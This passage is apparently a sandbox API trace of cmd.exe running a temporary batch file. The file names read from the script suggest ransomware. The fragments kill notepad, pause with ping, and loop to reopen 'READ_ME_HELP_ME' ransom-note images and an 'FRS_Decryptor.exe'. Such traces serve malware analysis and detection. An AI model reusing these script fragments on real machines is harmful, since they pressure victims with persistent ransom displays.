lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0125.447] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0125.447] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0125.447] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0125.447] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0125.447] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.447] GetFileType (hFile=0x2b8) returned 0x1 [0125.447] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0125.447] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0125.447] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0125.447] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0125.447] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0125.447] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.447] GetFileType (hFile=0x2b8) returned 0x1 [0125.447] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0125.447] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0125.447] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0125.447] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0125.447] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0125.447] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.447] GetFileType (hFile=0x2b8) returned 0x1 [0125.447] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0125.447] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0125.447] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0125.448] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0125.448] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0125.448] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.448] GetFileType (hFile=0x2b8) returned 0x1 [0125.448] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0125.448] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0125.448] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0125.448] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0125.448] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0125.448] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.448] GetFileType (hFile=0x2b8) returned 0x1 [0125.448] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0125.448] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0125.448] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0125.448] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0125.448] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0125.448] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.448] GetFileType (hFile=0x2b8) returned 0x1 [0125.448] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0125.448] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb9, lpOverlapped=0x0) returned 1 [0125.448] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2487, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0125.448] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 4\r\n") returned 2 [0125.448] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0125.448] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.448] GetFileType (hFile=0x2b8) returned 0x1 [0125.448] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9b7 [0125.448] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xb7, lpOverlapped=0x0) returned 1 [0125.448] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0125.448] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":4\r\n 4\r\n") returned 4 [0125.449] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0125.449] _get_osfhandle (_FileHandle=1) returned 0x28 [0125.449] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0125.449] _get_osfhandle (_FileHandle=0) returned 0x24 [0125.449] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0125.449] SetConsoleInputExeNameW () returned 0x1 [0125.449] GetConsoleOutputCP () returned 0x1b5 [0125.449] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0125.449] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.449] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b8 [0125.450] _open_osfhandle (_OSFileHandle=0x2b8, _Flags=8) returned 3 [0125.450] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.450] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2491, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0125.450] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9bb [0125.450] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0xb3, lpOverlapped=0x0) returned 1 [0125.450] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0125.450] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=21, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="ping -n 3 127.1>nul\r\nryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 21 [0125.450] GetFileType (hFile=0x2b8) returned 0x1 [0125.450] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.450] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0125.450] _tell (_FileHandle=3) returned 2512 [0125.450] _close (_FileHandle=3) returned 0 [0125.450] _wcsicmp (_String1="ping", _String2="DIR") returned 12 [0125.450] _wcsicmp (_String1="ping", _String2="ERASE") returned 11 [0125.450] _wcsicmp (_String1="ping", _String2="DEL") returned 12 [0125.450] _wcsicmp (_String1="ping", _String2="TYPE") returned -4 [0125.450] _wcsicmp (_String1="ping", _String2="COPY") returned 13 [0125.450] _wcsicmp (_String1="ping", _String2="CD") returned 13 [0125.450] _wcsicmp (_String1="ping", _String2="CHDIR") returned 13 [0125.450] _wcsicmp (_String1="ping", _String2="RENAME") returned -2 [0125.450] _wcsicmp (_String1="ping", _String2="REN") returned -2 [0125.450] _wcsicmp (_String1="ping", _String2="ECHO") returned 11 [0125.450] _wcsicmp (_String1="ping", _String2="SET") returned -3 [0125.450] _wcsicmp (_String1="ping", _String2="PAUSE") returned 8 [0125.450] _wcsicmp (_String1="ping", _String2="DATE") returned 12 [0125.450] _wcsicmp (_String1="ping", _String2="TIME") returned -4 [0125.450] _wcsicmp (_String1="ping", _String2="PROMPT") returned -9 [0125.451] _wcsicmp (_String1="ping", _String2="MD") returned 3 [0125.451] _wcsicmp (_String1="ping", _String2="MKDIR") returned 3 [0125.451] _wcsicmp (_String1="ping", _String2="RD") returned -2 [0125.451] _wcsicmp (_String1="ping", _String2="RMDIR") returned -2 [0125.451] _wcsicmp (_String1="ping", _String2="PATH") returned 8 [0125.451] _wcsicmp (_String1="ping", _String2="GOTO") returned 9 [0125.451] _wcsicmp (_String1="ping", _String2="SHIFT") returned -3 [0125.451] _wcsicmp (_String1="ping", _String2="CLS") returned 13 [0125.451] _wcsicmp (_String1="ping", _String2="CALL") returned 13 [0125.451] _wcsicmp (_String1="ping", _String2="VERIFY") returned -6 [0125.451] _wcsicmp (_String1="ping", _String2="VER") returned -6 [0125.451] _wcsicmp (_String1="ping", _String2="VOL") returned -6 [0125.451] _wcsicmp (_String1="ping", _String2="EXIT") returned 11 [0125.451] _wcsicmp (_String1="ping", _String2="SETLOCAL") returned -3 [0125.451] _wcsicmp (_String1="ping", _String2="ENDLOCAL") returned 11 [0125.451] _wcsicmp (_String1="ping", _String2="TITLE") returned -4 [0125.451] _wcsicmp (_String1="ping", _String2="START") returned -3 [0125.451] _wcsicmp (_String1="ping", _String2="DPATH") returned 12 [0125.451] _wcsicmp (_String1="ping", _String2="KEYS") returned 5 [0125.451] _wcsicmp (_String1="ping", _String2="MOVE") returned 3 [0125.451] _wcsicmp (_String1="ping", _String2="PUSHD") returned -12 [0125.451] _wcsicmp (_String1="ping", _String2="POPD") returned -6 [0125.451] _wcsicmp (_String1="ping", _String2="ASSOC") returned 15 [0125.451] _wcsicmp (_String1="ping", _String2="FTYPE") returned 10 [0125.451] _wcsicmp (_String1="ping", _String2="BREAK") returned 14 [0125.451] _wcsicmp (_String1="ping", _String2="COLOR") returned 13 [0125.451] _wcsicmp (_String1="ping", _String2="MKLINK") returned 3 [0125.451] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0125.451] SetErrorMode (uMode=0x0) returned 0x0 [0125.451] SetErrorMode (uMode=0x1) returned 0x0 [0125.451] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd67ba0, lpFilePart=0xc8efcc | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8efcc*="Desktop") returned 0x1c [0125.451] SetErrorMode (uMode=0x0) returned 0x1 [0125.451] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0125.451] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0125.451] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0125.451] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0125.452] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0125.452] GetLastError () returned 0x2 [0125.452] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0125.452] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd5a0b0 [0125.452] FindClose (in: hFindFile=0xd5a0b0 | out: hFindFile=0xd5a0b0) returned 1 [0125.452] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xffffffff [0125.452] GetLastError () returned 0x2 [0125.452] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8ed58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8ed58) returned 0xd59d70 [0125.452] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0125.452] GetFileType (hFile=0x28) returned 0x2 [0125.452] GetStdHandle (nStdHandle=0xfffffff5) returned 0x28 [0125.452] _dup (_FileHandle=1) returned 3 [0125.452] _close (_FileHandle=1) returned 0 [0125.452] _wcsicmp (_String1="nul", _String2="con") returned 11 [0125.452] CreateFileW (lpFileName="nul" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0xc8ef94, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0125.453] _open_osfhandle (_OSFileHandle=0x28, _Flags=8) returned 1 [0125.453] GetConsoleTitleW (in: lpConsoleTitle=0xc8edb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0125.453] _wcsnicmp (_String1="ping", _String2="cmd ", _MaxCount=0x4) returned 13 [0125.453] SetErrorMode (uMode=0x0) returned 0x0 [0125.453] SetErrorMode (uMode=0x1) returned 0x0 [0125.453] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xd61410, lpFilePart=0xc8e8b4 | out: lpBuffer="C:\\Users\\5JgHKoaOfdp\\Desktop", lpFilePart=0xc8e8b4*="Desktop") returned 0x1c [0125.453] SetErrorMode (uMode=0x0) returned 0x1 [0125.453] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0125.453] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0125.453] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x12c0840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0125.453] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0125.453] FindFirstFileExW (in: lpFileName="C:\\Users\\5JgHKoaOfdp\\Desktop\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0125.453] GetLastError () returned 0x2 [0125.453] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0125.453] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ping.*", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59ff0 [0125.453] FindClose (in: hFindFile=0xd59ff0 | out: hFindFile=0xd59ff0) returned 1 [0125.453] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xffffffff [0125.454] GetLastError () returned 0x2 [0125.454] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0xc8e640, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xc8e640) returned 0xd59d70 [0125.454] FindClose (in: hFindFile=0xd59d70 | out: hFindFile=0xd59d70) returned 1 [0125.454] GetConsoleTitleW (in: lpConsoleTitle=0xc8eb3c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0125.454] InitializeProcThreadAttributeList (in: lpAttributeList=0xc8ea68, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xc8ea4c | out: lpAttributeList=0xc8ea68, lpSize=0xc8ea4c) returned 1 [0125.454] UpdateProcThreadAttribute (in: lpAttributeList=0xc8ea68, dwFlags=0x0, Attribute=0x60001, lpValue=0xc8ea54, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xc8ea68, lpPreviousValue=0x0) returned 1 [0125.454] GetStartupInfoW (in: lpStartupInfo=0xc8eaa0 | out: lpStartupInfo=0xc8eaa0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="cmdln=", _MaxCount=0x7) returned 2 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.454] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.455] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0125.455] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0125.455] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0125.455] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0125.455] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0125.455] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0125.455] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0125.455] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0125.455] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0125.455] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0125.455] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0125.455] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0125.455] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0125.455] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x2b0, hThread=0x260, dwProcessId=0xa48, dwThreadId=0xbec)) returned 1 [0125.457] CloseHandle (hObject=0x260) returned 1 [0125.457] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0125.457] GetEnvironmentStringsW () returned 0xd30508* [0125.458] FreeEnvironmentStringsA (penv="=") returned 1 [0125.458] WaitForSingleObject (hHandle=0x2b0, dwMilliseconds=0xffffffff) returned 0x0 [0127.528] GetExitCodeProcess (in: hProcess=0x2b0, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0127.528] CloseHandle (hObject=0x2b0) returned 1 [0127.528] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0127.528] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0127.528] GetEnvironmentStringsW () returned 0xd7e510* [0127.528] FreeEnvironmentStringsA (penv="=") returned 1 [0127.528] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0127.528] GetEnvironmentStringsW () returned 0xd30508* [0127.528] FreeEnvironmentStringsA (penv="=") returned 1 [0127.528] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0127.528] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0127.528] _close (_FileHandle=3) returned 0 [0127.528] _get_osfhandle (_FileHandle=1) returned 0x28 [0127.529] SetConsoleMode (hConsoleHandle=0x28, 